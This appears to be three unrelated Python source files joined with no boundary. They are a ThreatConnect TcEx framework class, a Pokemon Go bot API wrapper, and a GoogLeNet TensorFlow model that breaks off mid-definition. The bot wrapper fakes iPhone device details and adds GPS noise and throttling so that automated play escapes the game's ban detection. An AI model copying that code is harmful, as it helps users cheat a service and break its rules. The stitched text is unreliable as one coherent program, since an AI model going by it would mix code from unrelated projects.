"""TcEx Framework""" # standard library import inspect import logging import os import platform import re import signal import sys import threading from typing import Optional from urllib.parse import quote from .app_config_object import InstallJson from .inputs import Inputs from .logger import Logger from .tokens import Tokens class TcEx: """Provides basic functionality for all types of TxEx Apps. Args: config (dict, kwargs): A dictionary containing configuration items typically used by external Apps. config_file (str, kwargs): A filename containing JSON configuration items typically used by external Apps. logger (logging.Logger, kwargs): An pre-configured instance of logger to use instead of tcex logger. """ def __init__(self, **kwargs): """Initialize Class Properties.""" # catch interupt signals if threading.current_thread().name == 'MainThread': signal.signal(signal.SIGINT, self._signal_handler) if platform.system() != 'Windows': signal.signal(signal.SIGHUP, self._signal_handler) signal.signal(signal.SIGTERM, self._signal_handler) # Property defaults self._config: dict = kwargs.get('config') or {} self._default_args = None self._error_codes = None self._exit_code = 0 self._indicator_associations_types_data = {} self._indicator_types = None self._indicator_types_data = None self._jobs = None self._key_value_store = None self._logger = None self._playbook = None self._redis_client = None self._service = None self._session = None self._session_external = None self._stix_model = None self._utils = None self._ti = None self._token = None self.ij = InstallJson() # add custom logger if provided self._log: object = kwargs.get('logger') # init args (needs logger) self.inputs = Inputs(self, self._config, kwargs.get('config_file')) def _association_types(self): """Retrieve Custom Indicator Associations types from the ThreatConnect API.""" # Dynamically create custom indicator class r: object = self.session.get('/v2/types/associationTypes') # check for bad status code and response that is not JSON if not r.ok or 'application/json' not in r.headers.get('content-type', ''): self.log.warning('feature=tcex, event=association-types-download, status=failure') return # validate successful API results data: dict = r.json() if data.get('status') != 'Success': self.log.warning('feature=tcex, event=association-types-download, status=failure') return try: # Association Type Name is not a unique value at this time, but should be. for association in data.get('data', {}).get('associationType', []): self._indicator_associations_types_data[association.get('name')] = association except Exception as e: self.handle_error(200, [e]) def _signal_handler( self, signal_interupt: int, frame: object # pylint: disable=unused-argument ) -> None: """Handle singal interrupt.""" call_file: str = os.path.basename(inspect.stack()[1][0].f_code.co_filename) call_module: str = inspect.stack()[1][0].f_globals['__name__'].lstrip('Functions.') call_line: int = inspect.stack()[1][0].f_lineno self.log.error( f'App interrupted - file: {call_file}, method: {call_module}, line: {call_line}.' ) if signal_interupt in (2, 15): self.exit(1, 'The App received an interrupt signal and will now exit.') def advanced_request( self, session: object, timeout: Optional[int] = 600, output_prefix: Optional[str] = None ) -> object: """Return instance of AdvancedRequest. Args: session (object): An instance of requests.Session. timeout (int): The number of second before timing out the request. Returns: object: An instance of AdvancedRequest """ from .app_feature import AdvancedRequest return AdvancedRequest(session, self, timeout, output_prefix) def aot_rpush(self, exit_code: int) -> None: """Push message to AOT action channel.""" if self.default_args.tc_playbook_db_type == 'Redis': try: self.redis_client.rpush(self.default_args.tc_exit_channel, exit_code) except Exception as e: # pragma: no cover self.exit(1, f'Exception during AOT exit push ({e}).') @property def args(self) -> object: """Argparser args Namespace.""" return self.inputs.args() def batch( self, owner: str, action: Optional[str] = 'Create', attribute_write_type: Optional[str] = 'Replace', halt_on_error: Optional[bool] = False, playbook_triggers_enabled: Optional[bool] = False, ) -> object: """Return instance of Batch Args: tcex: An instance of TcEx object. owner: The ThreatConnect owner for Batch action. action: Action for the batch job ['Create', 'Delete']. attribute_write_type: Write type for TI attributes ['Append', 'Replace']. halt_on_error: If True any batch error will halt the batch job. playbook_triggers_enabled: Deprecated input, will not be used. Returns: object: An instance of the Batch Class. """ from .batch import Batch return Batch( self, owner, action, attribute_write_type, halt_on_error, playbook_triggers_enabled ) def cache( self, domain: str, data_type: str, ttl_seconds: Optional[int] = None, mapping: Optional[dict] = None, ) -> object: """Get instance of the Cache module. Args: domain: The domain can be either "system", "organization", or "local". When using "organization" the data store can be accessed by any Application in the entire org, while "local" access is restricted to the App writing the data. The "system" option should not be used in almost all cases. data_type: The data type descriptor (e.g., tc:whois:cache). ttl_seconds: The number of seconds the cache is valid. mapping: Advanced - The datastore mapping if required. Returns: object: An instance of the Cache Class. """ from .datastore import Cache return Cache(self, domain, data_type, ttl_seconds, mapping) @property def case_management(self) -> object: """Include the Threat Intel Module. .. Note:: Threat Intell methods can be accessed using ``tcex.ti.<method>``. Returns: object: An instance of the CaseManagement Class. """ from .case_management import CaseManagement return CaseManagement(self) @property def cm(self) -> object: """Include the Case Management Module.""" return self.case_management def datastore(self, domain: str, data_type: str, mapping: Optional[dict] = None) -> object: """Get instance of the DataStore module. Args: domain: The domain can be either "system", "organization", or "local". When using "organization" the data store can be accessed by any Application in the entire org, while "local" access is restricted to the App writing the data. The "system" option should not be used in almost all cases. data_type: The data type descriptor (e.g., tc:whois:cache). mapping: ElasticSearch mappings data. Returns: object: An instance of the DataStore Class. """ from .datastore import DataStore return DataStore(self, domain, data_type, mapping) @property def default_args(self) -> object: """Argparser args Namespace.""" return self._default_args @property def error_codes(self) -> object: """Return TcEx error codes.""" if self._error_codes is None: from .tcex_error_codes import TcExErrorCodes self._error_codes = TcExErrorCodes() return self._error_codes def exit(self, code: Optional[int] = None, msg: Optional[str] = None) -> None: """Application exit method with proper exit code The method will run the Python standard sys.exit() with the exit code previously defined via :py:meth:`~tcex.tcex.TcEx.exit_code` or provided during the call of this method. Args: code: The exit code value for the app. msg: A message to log and add to message tc output. """ # add exit message to message.tc file and log if msg is not None: if code in [0, 3] or (code is None and self.exit_code in [0, 3]): self.log.info(msg) else: self.log.error(msg) self.message_tc(msg) if code is None: code = self.exit_code elif code in [0, 1, 3]: pass else: self.log.error('Invalid exit code') code = 1 if self.default_args.tc_aot_enabled: # push exit message self.aot_rpush(code) # exit token renewal thread self.token.shutdown = True self.log.info(f'Exit Code: {code}') sys.exit(code) @property def exit_code(self) -> None: """Return the current exit code.""" return self._exit_code @exit_code.setter def exit_code(self, code: int) -> None: """Set the App exit code. For TC Exchange Apps there are 3 supported exit codes. * 0 indicates a normal exit * 1 indicates a failure during execution * 3 indicates a partial failure Args: code (int): The exit code value for the app. """ if code is not None and code in [0, 1, 3]: self._exit_code = code else: self.log.warning('Invalid exit code') @staticmethod def expand_indicators(indicator: str) -> list: """Process indicators expanding file hashes/custom indicators into multiple entries. Args: indicator: An " : " delimited string. Returns: (list): a list of indicators split on " : ". """ if indicator.count(' : ') > 0: # handle all multi-valued indicators types (file hashes and custom indicators) indicator_list = [] # group 1 - lazy capture everything to first <space>:<space> or end of line iregx_pattern = r'^(.*?(?=\s\:\s|$))?' iregx_pattern += r'(?:\s\:\s)?' # remove <space>:<space> # group 2 - look behind for <space>:<space>, lazy capture everything # to look ahead (optional <space>):<space> or end of line iregx_pattern += r'((?<=\s\:\s).*?(?=(?:\s)?\:\s|$))?' iregx_pattern += r'(?:(?:\s)?\:\s)?' # remove (optional <space>):<space> # group 3 - look behind for <space>:<space>, lazy capture everything # to look ahead end of line iregx_pattern += r'((?<=\s\:\s).*?(?=$))?$' iregx = re.compile(iregx_pattern) indicators = iregx.search(indicator) if indicators is not None: indicator_list = list(indicators.groups()) else: # handle all single valued indicator types (address, host, etc) indicator_list = [indicator] return indicator_list @property def group_types(self) -> list: """Return all defined ThreatConnect Group types. Returns: (list): A list of ThreatConnect Group types. """ return [ 'Adversary', 'Campaign', 'Document', 'Email', 'Event', 'Incident', 'Intrusion Set', 'Signature', 'Report', 'Threat', 'Task', ] @property def group_types_data(self) -> dict: """Return supported ThreatConnect Group types.""" return { 'Adversary': {'apiBranch': 'adversaries', 'apiEntity': 'adversary'}, 'Campaign': {'apiBranch': 'campaigns', 'apiEntity': 'campaign'}, 'Document': {'apiBranch': 'documents', 'apiEntity': 'document'}, 'Email': {'apiBranch': 'emails', 'apiEntity': 'email'}, 'Event': {'apiBranch': 'events', 'apiEntity': 'event'}, 'Incident': {'apiBranch': 'incidents', 'apiEntity': 'incident'}, 'Intrusion Set': {'apiBranch': 'intrusionSets', 'apiEntity': 'intrusionSet'}, 'Report': {'apiBranch': 'reports', 'apiEntity': 'report'}, 'Signature': {'apiBranch': 'signatures', 'apiEntity': 'signature'}, 'Threat': {'apiBranch': 'threats', 'apiEntity': 'threat'}, 'Task': {'apiBranch': 'tasks', 'apiEntity': 'task'}, } def get_type_from_api_entity(self, api_entity: dict) -> Optional[str]: """Return the object type as a string given a api entity. Args: api_entity: A TCEntity object. Returns: str, None: The type value or None. """ merged = self.group_types_data.copy() merged.update(self.indicator_types_data) for key, value in merged.items(): if value.get('apiEntity') == api_entity: return key return None def handle_error( self, code: int, message_values: Optional[list] = None, raise_error: Optional[bool] = True ) -> None: """Raise RuntimeError Args: code: The error code from API or SDK. message: The error message from API or SDK. raise_error: Raise a Runtime error. Defaults to True. Raises: RuntimeError: Raised a defined error. """ try: if message_values is None: message_values = [] message = self.error_codes.message(code).format(*message_values) self.log.error(f'Error code: {code}, {message}') except AttributeError: self.log.error(f'Incorrect error code provided ({code}).') raise RuntimeError(100, 'Generic Failure, see logs for more details.') except IndexError: self.log.error( f'Incorrect message values provided for error code {code} ({message_values}).' ) raise RuntimeError(100, 'Generic Failure, see logs for more details.') if raise_error: raise RuntimeError(code, message) @property def indicator_associations_types_data(self) -> dict: """Return ThreatConnect associations type data. Retrieve the data from the API if it hasn't already been retrieved. Returns: (dict): A dictionary of ThreatConnect associations types. """ if not self._indicator_associations_types_data: self._association_types() # load custom indicator associations return self._indicator_associations_types_data @property def indicator_types(self) -> list: """Return ThreatConnect Indicator types. Retrieve the data from the API if it hasn't already been retrieved. Returns: (list): A list of ThreatConnect Indicator types. """ if not self._indicator_types: self._indicator_types = self.indicator_types_data.keys() return self._indicator_types @property def indicator_types_data(self) -> dict: """Return ThreatConnect indicator types data. Retrieve the data from the API if it hasn't already been retrieved. Returns: (dict): A dictionary of ThreatConnect Indicator data. """ if not self._indicator_types_data: self._indicator_types_data = {} # retrieve data from API r = self.session.get('/v2/types/indicatorTypes') # TODO: use handle error instead if not r.ok: raise RuntimeError('Could not retrieve indicator types from ThreatConnect API.') for itd in r.json().get('data', {}).get('indicatorType'): self._indicator_types_data[itd.get('name')] = itd return self._indicator_types_data @property def key_value_store(self) -> object: """Return the correct KV store for this execution. The TCKeyValueAPI KV store is limited to two operations (create and read), while the Redis kvstore wraps a few other Redis methods. """ if self._key_value_store is None: if self.default_args.tc_playbook_db_type == 'Redis': from .key_value_store import KeyValueRedis self._key_value_store = KeyValueRedis(self.redis_client) elif self.default_args.tc_playbook_db_type == 'TCKeyValueAPI': from .key_value_store import KeyValueApi # providing runtime_level to KeyValueApi for service Apps so that the new # API endpoint (in TC 6.0.7) can be used with the context. this new # endpoint could be used for PB Apps, however to support versions of # TC < 6.0.7 the old endpoint must still be used. self._key_value_store = KeyValueApi(self.session, self.ij.runtime_level.lower()) else: # pragma: no cover raise RuntimeError(f'Invalid DB Type: ({self.default_args.tc_playbook_db_type})') return self._key_value_store @property def log(self) -> object: """Return a valid logger.""" if self._log is None: self._log = self.logger.log return self._log @log.setter def log(self, log: object) -> None: """Return a valid logger.""" if isinstance(log, logging.Logger): self._log = log @property def logger(self) -> object: """Return logger.""" if self._logger is None: logger_name = self._config.get('tc_logger_name', 'tcex') self._logger = Logger(self, logger_name) self._logger.add_cache_handler('cache') return self._logger def metric( self, name: str, description: str, data_type: str, interval: str, keyed: Optional[bool] = False, ) -> object: """Get instance of the Metrics module. Args: name: The name for the metric. description: The description of the metric. data_type: The type of metric: Sum, Count, Min, Max, First, Last, and Average. interval: The metric interval: Hourly, Daily, Weekly, Monthly, and Yearly. keyed: Indicates whether the data will have a keyed value. Returns: (object): An instance of the Metrics Class. """ from .metrics import Metrics return Metrics(self, name, description, data_type, interval, keyed) def message_tc(self, message: str, max_length: Optional[int] = 255) -> None: """Write data to message_tc file in TcEX specified directory. This method is used to set and exit message in the ThreatConnect Platform. ThreatConnect only supports files of max_message_length. Any data exceeding this limit will be truncated. The last <max_length> characters will be preserved. Args: message: The message to add to message_tc file max_length: The maximum length of an exit message. Defaults to 255. """ if not isinstance(message, str): message = str(message) if os.access(self.default_args.tc_out_path, os.W_OK): message_file = os.path.join(self.default_args.tc_out_path, 'message.tc') else: message_file = 'message.tc' if os.path.isfile(message_file): with open(message_file) as mh: message = mh.read() + message if not message.endswith('\n'): message += '\n' with open(message_file, 'w') as mh: # write last <max_length> characters to file mh.write(message[-max_length:]) def notification(self) -> object: """Get instance of the Notification module. Returns: (object): An instance of the Notification Class. """ from .notifications import Notifications return Notifications(self) @property def parser(self) -> object: """Instance tcex args parser.""" return self.inputs.parser def pb(self, context: str, output_variables: list) -> object: """Return a new instance of playbook module. Args: context: The Redis context for Playbook or Service Apps. output_variables: A list of requested PB/Service output variables. Returns: tcex.playbook.Playbooks: An instance of Playbooks """ from .playbooks import Playbooks return Playbooks(self, context, output_variables) @property def playbook(self) -> object: """Return an instance of Playbooks module. This property defaults context and outputvariables to arg values. .. Note:: Playbook methods can be accessed using ``tcex.playbook.<method>``. Returns: tcex.playbook.Playbooks: An instance of Playbooks """ if self._playbook is None: # handle outputs coming in as a csv string and list outputs: list = self.default_args.tc_playbook_out_variables or [] if isinstance(outputs, str): outputs = outputs.split(',') self._playbook: object = self.pb(self.default_args.tc_playbook_db_context, outputs) return self._playbook @property def proxies(self) -> dict: """Format the proxy configuration for Python Requests module. Generates a dictionary for use with the Python Requests module format when proxy is required for remote connections. **Example Response** :: {"http": "http://user:pass@10.10.1.10:3128/"} Returns: (dict): Dictionary of proxy settings """ proxies = {} if ( self.default_args.tc_proxy_host is not None and self.default_args.tc_proxy_port is not None ): if ( self.default_args.tc_proxy_username is not None and self.default_args.tc_proxy_password is not None ): tc_proxy_username = quote(self.default_args.tc_proxy_username, safe='~') tc_proxy_password = quote(self.default_args.tc_proxy_password, safe='~') # proxy url with auth proxy_url = ( f'{tc_proxy_username}:{tc_proxy_password}' f'@{self.default_args.tc_proxy_host}:{self.default_args.tc_proxy_port}' ) else: # proxy url without auth proxy_url = f'{self.default_args.tc_proxy_host}:{self.default_args.tc_proxy_port}' proxies = {'http': f'http://{proxy_url}', 'https': f'http://{proxy_url}'} return proxies @property def rargs(self) -> object: """Return argparser args Namespace with Playbook args automatically resolved.""" return self.inputs.resolved_args() @staticmethod def rc(host, port, db=0, blocking=False, **kwargs) -> object: """Return a *new* instance of Redis client. For a full list of kwargs see https://redis-py.readthedocs.io/en/latest/#redis.Connection. Args: host (str, optional): The REDIS host. Defaults to localhost. port (int, optional): The REDIS port. Defaults to 6379. db (int, optional): The REDIS db. Defaults to 0. blocking_pool (bool): Use BlockingConnectionPool instead of ConnectionPool. errors (str, kwargs): The REDIS errors policy (e.g. strict). max_connections (int, kwargs): The maximum number of connections to REDIS. password (str, kwargs): The REDIS password. socket_timeout (int, kwargs): The REDIS socket timeout. timeout (int, kwargs): The REDIS Blocking Connection Pool timeout value. Returns: Redis.client: An instance of redis client. """ from .key_value_store import RedisClient return RedisClient(host=host, port=port, db=db, blocking=blocking, **kwargs).client @property def redis_client(self) -> object: """Return redis client instance configure for Playbook/Service Apps.""" if self._redis_client is None: from .key_value_store import RedisClient self._redis_client = RedisClient( host=self.default_args.tc_playbook_db_path, port=self.default_args.tc_playbook_db_port, db=0, ).client return self._redis_client def results_tc(self, key: str, value: str) -> None: """Write data to results_tc file in TcEX specified directory. The TcEx platform support persistent values between executions of the App. This method will store the values for TC to read and put into the Database. Args: key: The data key to be stored. value: The data value to be stored. """ if os.access(self.default_args.tc_out_path, os.W_OK): results_file = f'{self.default_args.tc_out_path}/results.tc' else: results_file = 'results.tc' new = True open(results_file, 'a').close() # ensure file exists with open(results_file, 'r+') as fh: results = '' for line in fh.read().strip().split('\n'): if not line: continue try: k, v = line.split(' = ') except ValueError: # handle null/empty value (e.g., "name =") k, v = line.split(' =') if k == key: v = value new = False if v is not None: results += f'{k} = {v}\n' if new and value is not None: # indicates the key/value pair didn't already exist results += f'{key} = {value}\n' fh.seek(0) fh.write(results) fh.truncate() @staticmethod def safe_indicator(indicator: str) -> str: """Format indicator value for safe HTTP request. Args: indicator: Indicator to URL Encode Returns: (str): The urlencoded string """ if indicator is not None: indicator = quote(indicator, safe='~') return indicator @staticmethod def safe_rt(resource_type: str, lower: Optional[bool] = False) -> str: """Format the Resource Type. Takes Custom Indicator types with a space character and return a *safe* string. (e.g. *User Agent* is converted to User_Agent or user_agent.) Args: resource_type: The resource type to format. lower: Return type in all lower case Returns: (str): The formatted resource type. """ if resource_type is not None: resource_type = resource_type.replace(' ', '_') if lower: resource_type = resource_type.lower() return resource_type @staticmethod def safe_group_name( group_name: str, group_max_length: Optional[int] = 100, ellipsis: Optional[bool] = True ): """Truncate group name to match limit breaking on space and optionally add an ellipsis. .. note:: Currently the ThreatConnect group name limit is 100 characters. Args: group_name: The raw group name to be truncated. group_max_length: The max length of the group name. ellipsis: If true the truncated name will have '...' appended. Returns: (str): The truncated group name with optional ellipsis. """ ellipsis_value = '' if ellipsis: ellipsis_value = ' ...' if group_name is not None and len(group_name) > group_max_length: # split name by spaces and reset group_name group_name_array = group_name.split(' ') group_name = '' for word in group_name_array: word = f'{word}' if (len(group_name) + len(word) + len(ellipsis_value)) >= group_max_length: group_name = f'{group_name}{ellipsis_value}' group_name = group_name.lstrip(' ') break group_name += f' {word}' return group_name @staticmethod def safe_tag(tag: str) -> str: """Encode and truncate tag to match limit (128 characters) of ThreatConnect API. Args: tag: The tag to be truncated Returns: (str): The truncated and quoted tag. """ if tag is not None: tag = quote(tag[:128], safe='~') return tag @staticmethod def safe_url(url: str) -> str: """Encode value for safe HTTP request. Args: url (str): The string to URL Encode. Returns: (str): The urlencoded string. """ if url is not None: url: str = quote(url, safe='~') return url @property def service(self) -> object: """Include the Service Module. .. Note:: Service methods can be accessed using ``tcex.service.<method>``. """ if self._service is None: if self.ij.runtime_level.lower() == 'apiservice': from .services import ApiService as Service elif self.ij.runtime_level.lower() == 'triggerservice': from .services import CommonServiceTrigger as Service elif self.ij.runtime_level.lower() == 'webhooktriggerservice': from .services import WebhookTriggerService as Service else: self.exit(1, 'Could not determine the service type.') self._service = Service(self) return self._service @property def session(self) -> object: """Return an instance of Requests Session configured for the ThreatConnect API.""" if self._session is None: from .sessions import TcSession self._session = TcSession( logger=self.log, api_access_id=self.default_args.api_access_id, api_secret_key=self.default_args.api_secret_key, base_url=self.default_args.tc_api_path, ) # set verify self._session.verify = self.default_args.tc_verify # set token self._session.token = self.token # update User-Agent self._session.headers.update( {'User-Agent': f'TcEx: {__import__(__name__).__version__}'} ) # add proxy support if requested if self.default_args.tc_proxy_tc: self._session.proxies = self.proxies self.log.info( f'Using proxy host {self.args.tc_proxy_host}:' f'{self.args.tc_proxy_port} for ThreatConnect session.' ) # enable curl logging if tc_log_curl param is set. if self.default_args.tc_log_curl: self._session.log_curl = True return self._session @property def session_external(self) -> object: """Return an instance of Requests Session configured for the ThreatConnect API.""" if self._session_external is None: from .sessions import ExternalSession self._session_external = ExternalSession(logger=self.log) # add User-Agent to headers self._session_external.headers.update( {'User-Agent': f'TcEx App: {self.ij.display_name} - {self.ij.program_version}'} ) # add proxy support if requested if self.default_args.tc_proxy_external: self._session_external.proxies = self.proxies self.log.info( f'Using proxy host {self.args.tc_proxy_host}:' f'{self.args.tc_proxy_port} for external session.' ) if self.default_args.tc_log_curl: self._session_external.log_curl = True return self._session_external @property def stix_model(self) -> object: """Include the Threat Intel Module. .. Note:: Threat Intell methods can be accessed using ``tcex.ti.<method>``. """ if self._stix_model is None: from .stix import StixModel self._stix_model = StixModel(self.logger) return self._stix_model @property def ti(self) -> object: """Include the Threat Intel Module. .. Note:: Threat Intell methods can be accessed using ``tcex.ti.<method>``. """ if self._ti is None: from .threat_intelligence import ThreatIntelligence self._ti = ThreatIntelligence(self) return self._ti @property def token(self) -> object: """Return token object.""" if self._token is None: sleep_interval = int(os.getenv('TC_TOKEN_SLEEP_INTERVAL', '30')) self._token = Tokens( self.default_args.tc_api_path, sleep_interval, self.default_args.tc_verify, self.log ) return self._token @property def utils(self) -> object: """Include the Utils module. .. Note:: Utils methods can be accessed using ``tcex.utils.<method>``. """ if self._utils is None: from .utils import Utils self._utils = Utils(temp_path=self.default_args.tc_temp_path) return self._utils @property def victim_asset_types(self) -> list: """Return all defined ThreatConnect Asset types. Returns: (list): A list of ThreatConnect Asset types. """ return [ 'EmailAddress', 'SocialNetwork', 'NetworkAccount', 'WebSite', 'Phone', ]
from __future__ import absolute_import import time import logging import random, base64, struct import hashlib import os import urllib import sys from pgoapi.exceptions import (ServerSideRequestThrottlingException, NotLoggedInException, ServerBusyOrOfflineException, NoPlayerPositionSetException, HashingOfflineException, UnexpectedResponseException) from pgoapi.pgoapi import PGoApi from pgoapi.pgoapi import PGoApiRequest from pgoapi.pgoapi import RpcApi from pgoapi.protos.pogoprotos.networking.requests.request_type_pb2 import RequestType from pgoapi.utilities import get_time from .human_behaviour import sleep, gps_noise_rng from pokemongo_bot.base_dir import _base_dir class PermaBannedException(Exception): pass class ApiWrapper(PGoApi, object): DEVICE_ID = None def __init__(self, config=None): self.config = config self.gen_device_id() device_info = { "device_id": ApiWrapper.DEVICE_ID, "device_brand": 'Apple', "device_model": 'iPhone', "device_model_boot": 'iPhone8,2', "hardware_manufacturer": 'Apple', "hardware_model": 'N66AP', "firmware_brand": 'iPhone OS', "firmware_type": '9.3.3' } PGoApi.__init__(self, device_info=device_info) if not self.config.hashkey is None: PGoApi.activate_hash_server(self,self.config.hashkey) # Set to default, just for CI... self.actual_lat, self.actual_lng, self.actual_alt = PGoApi.get_position(self) self.teleporting = False self.noised_lat, self.noised_lng, self.noised_alt = self.actual_lat, self.actual_lng, self.actual_alt self.useVanillaRequest = False def gen_device_id(self): if self.config is None or self.config.username is None: ApiWrapper.DEVICE_ID = "3d65919ca1c2fc3a8e2bd7cc3f974c34" return file_salt = None did_path = os.path.join(_base_dir, 'data', 'deviceid-%s.txt' % self.config.username) if os.path.exists(did_path): file_salt = open(did_path, 'r').read() if self.config is not None: key_string = self.config.username if file_salt is not None: # Config and file are set, so use those. ApiWrapper.DEVICE_ID = hashlib.md5(key_string + file_salt).hexdigest() else: # Config is set, but file isn't, so make it. rand_float = random.SystemRandom().random() salt = base64.b64encode((struct.pack('!d', rand_float))) ApiWrapper.DEVICE_ID = hashlib.md5(key_string + salt).hexdigest() with open(did_path, "w") as text_file: text_file.write("{0}".format(salt)) else: if file_salt is not None: # No config, but there's a file, use it. ApiWrapper.DEVICE_ID = hashlib.md5(file_salt).hexdigest() else: # No config or file, so make up a reasonable default. ApiWrapper.DEVICE_ID = "3d65919ca1c2fc3a8e2bd7cc3f974c34" def create_request(self): RequestClass = ApiRequest if self.useVanillaRequest: RequestClass = PGoApiRequest return RequestClass( self, self._position_lat, self._position_lng, self._position_alt ) def login(self, provider, username, password): # login needs base class "create_request" self.useVanillaRequest = True try: PGoApi.set_authentication( self, provider, username=username, password=password ) except: raise response = PGoApi.app_simulation_login(self) # cleanup code self.useVanillaRequest = False return response def set_position(self, lat, lng, alt=None, teleporting=False): self.actual_lat = lat self.actual_lng = lng if None != alt: self.actual_alt = alt else: alt = self.actual_alt self.teleporting = teleporting if self.config.replicate_gps_xy_noise: lat_noise = gps_noise_rng(self.config.gps_xy_noise_range) lng_noise = gps_noise_rng(self.config.gps_xy_noise_range) lat = lat + lat_noise lng = lng + lng_noise if self.config.replicate_gps_z_noise: alt_noise = gps_noise_rng(self.config.gps_z_noise_range) alt = alt + alt_noise self.noised_lat, self.noised_lng, self.noised_alt = lat, lng, alt PGoApi.set_position(self, lat, lng, alt) def get_position(self): return (self.actual_lat, self.actual_lng, self.actual_alt) class ApiRequest(PGoApiRequest): def __init__(self, *args): PGoApiRequest.__init__(self, *args) self.logger = logging.getLogger(__name__) self.request_callers = [] self.last_api_request_time = None self.requests_per_seconds = 2 def can_call(self): if not self._req_method_list: raise EmptySubrequestChainException() if (self._position_lat is None) or (self._position_lng is None) or (self._position_alt is None): raise NoPlayerPositionSetException() if self._auth_provider is None or not self._auth_provider.is_login(): self.log.info('Not logged in') raise NotLoggedInException() return True def _call(self): return PGoApiRequest.call(self) def _pop_request_callers(self): r = self.request_callers self.request_callers = [] return [i.upper() for i in r] def is_response_valid(self, result, request_callers): if not result or result is None or not isinstance(result, dict): return False if not 'responses' in result or not 'status_code' in result: return False if not isinstance(result['responses'], dict): return False try: # Permaban symptom is empty response to GET_INVENTORY and status_code = 3 if result['status_code'] == 3 and 'GET_INVENTORY' in request_callers and not result['responses'][ 'GET_INVENTORY']: raise PermaBannedException except KeyError: # Still wrong return False # the response can still programatically be valid at this point # but still be wrong. we need to check if the server did sent what we asked it for request_caller in request_callers: if not request_caller in result['responses']: return False return True def call(self, max_retry=15): request_callers = self._pop_request_callers() if not self.can_call(): return False # currently this is never ran, exceptions are raised before request_timestamp = None api_req_method_list = self._req_method_list result = None try_cnt = 0 throttling_retry = 0 unexpected_response_retry = 0 while True: request_timestamp = self.throttle_sleep() # self._call internally clear this field, so save it self._req_method_list = [req_method for req_method in api_req_method_list] should_throttle_retry = False should_unexpected_response_retry = False hashing_offline = False try: result = self._call() except ServerSideRequestThrottlingException: should_throttle_retry = True except HashingOfflineException: hashing_offline = True except UnexpectedResponseException: should_unexpected_response_retry = True except: should_unexpected_response_retry = True if hashing_offline: self.logger.warning('Hashing server issue, retrying in 5 Secs...') sleep(5) continue if should_throttle_retry: throttling_retry += 1 if throttling_retry >= max_retry: raise ServerSideRequestThrottlingException('Server throttled too many times') sleep(1) # huge sleep ? continue # skip response checking if should_unexpected_response_retry: unexpected_response_retry += 1 if unexpected_response_retry >= 5: self.logger.warning( 'Server is not responding correctly to our requests. Waiting for 30 seconds to reconnect.') sleep(30) else: sleep(2) continue if not self.is_response_valid(result, request_callers): try_cnt += 1 if try_cnt > 3: self.logger.warning( 'Server seems to be busy or offline - try again - {}/{}'.format(try_cnt, max_retry)) if try_cnt >= max_retry: raise ServerBusyOrOfflineException() sleep(1) else: break self.last_api_request_time = request_timestamp return result def __getattr__(self, func): if func.upper() in RequestType.keys(): self.request_callers.append(func) return PGoApiRequest.__getattr__(self, func) def throttle_sleep(self): now_milliseconds = time.time() * 1000 required_delay_between_requests = 1000 / self.requests_per_seconds difference = now_milliseconds - (self.last_api_request_time if self.last_api_request_time else 0) if self.last_api_request_time != None and difference < required_delay_between_requests: sleep_time = required_delay_between_requests - difference time.sleep(sleep_time / 1000) return now_milliseconds
# Preferred settings for this model is: # Training epochs = 80 # Crop Size = 224 # Learning Rate = 0.001 # Under advanced learning rate options: # Step Size = 10.0 # Gamma = 0.96 # The auxillary branches as spcified in the original googlenet V1 model do exist in this implementation of # googlenet but it is not used. To use it, be sure to check self.is_training to ensure that it is only used # during training. from model import Tower from utils import model_property import tensorflow as tf import utils as digits class UserModel(Tower): all_inception_settings = { '3a': [[64], [96, 128], [16, 32], [32]], '3b': [[128], [128, 192], [32, 96], [64]], '4a': [[192], [96, 208], [16, 48], [64]], '4b': [[160], [112, 224], [24, 64], [64]], '4c': [[128], [128, 256], [24, 64], [64]], '4d': [[112], [144, 288], [32, 64], [64]], '4e': [[256], [160, 320], [32, 128], [128]], '5a': [[256], [160, 320], [32, 128], [128]], '5b': [[384], [192, 384], [48, 128], [128]] } @model_property def inference(self): # rescale to proper form, really we expect 224 x 224 x 1 in HWC form model = tf.reshape(self.x, shape=[-1, self.input_shape[0], self.input_shape[1], self.input_shape[2]]) conv_7x7_2s_weight, conv_7x7_2s_bias = self.create_conv_vars([7, 7, self.input_shape[2], 64], 'conv_7x7_2s') model = self.conv_layer_with_relu(model, conv_7x7_2s_weight, conv_7x7_2s_bias, 2) model = self.max_pool(model, 3, 2) # model = tf.nn.local_response_normalization(model) conv_1x1_vs_weight, conv_1x1_vs_bias = self.create_conv_vars([1, 1, 64, 64], 'conv_1x1_vs') model = self.conv_layer_with_relu(model, conv_1x1_vs_weight, conv_1x1_vs_bias, 1, 'VALID') conv_3x3_1s_weight, conv_3x3_1s_bias = self.create_conv_vars([3, 3, 64, 192], 'conv_3x3_1s') model = self.conv_layer_with_relu(model, conv_3x3_1s_weight, conv_3x3_1s_bias, 1) # model = tf.nn.local_response_normalization(model) model = self.max_pool(model, 3, 2) inception_settings_3a = InceptionSettings(192, UserModel.all_inception_settings['3a']) model = self.inception(model, inception_settings_3a, '3a') inception_settings_3b = InceptionSettings(256, UserModel.all_inception_settings['3b']) model = self.inception(model, inception_settings_3b, '3b') model = self.max_pool(model, 3, 2) inception_settings_4a = InceptionSettings(480, UserModel.all_inception_settings['4a']) model = self.inception(model, inception_settings_4a, '4a') # first auxiliary branch for making training faster # aux_branch_1 = self.auxiliary_classifier(model, 512, "aux_1") inception_settings_4b = InceptionSettings(512, UserModel.all_inception_settings['4b']) model = self.inception(model, inception_settings_4b, '4b') inception_settings_4c = InceptionSettings(512, UserModel.all_inception_settings['4c']) model = self.inception(model, inception_settings_4c, '4c') inception_settings_4d = InceptionSettings(512, UserModel.all_inception_settings['4d']) model = self.inception(model, inception_settings_4d, '4d') # second auxiliary branch for making training faster # aux_branch_2 = self.auxiliary_classifier(model, 528, "aux_2") inception_settings_4e = InceptionSettings(528, UserModel.all_inception_settings['4e']) model = self.inception(model, inception_settings_4e, '4e') model = self.max_pool(model, 3, 2) inception_settings_5a = InceptionSettings(832, UserModel.all_inception_settings['5a']) model = self.inception(model, inception_settings_5a, '5a') inception_settings_5b = InceptionSettings(832, UserModel.all_inception_settings['5b']) model = self.inception(model, inception_settings_5b, '5b') model = self.avg_pool(model, 7, 1, 'VALID') fc_weight, fc_bias = self.create_fc_vars([1024, self.nclasses], 'fc') model = self.fully_connect(model, fc_weight, fc_bias) # if self.is_training: # return [aux_branch_1, aux_branch_2, model] return model @model_property def loss(self): model = self.inference loss = digits.classification_loss(model, self.y) accuracy = digits.classification_accuracy(model, self.y) self.summaries.append(tf.summary.scalar(accuracy.op.name, accuracy)) return loss def inception(self, model, 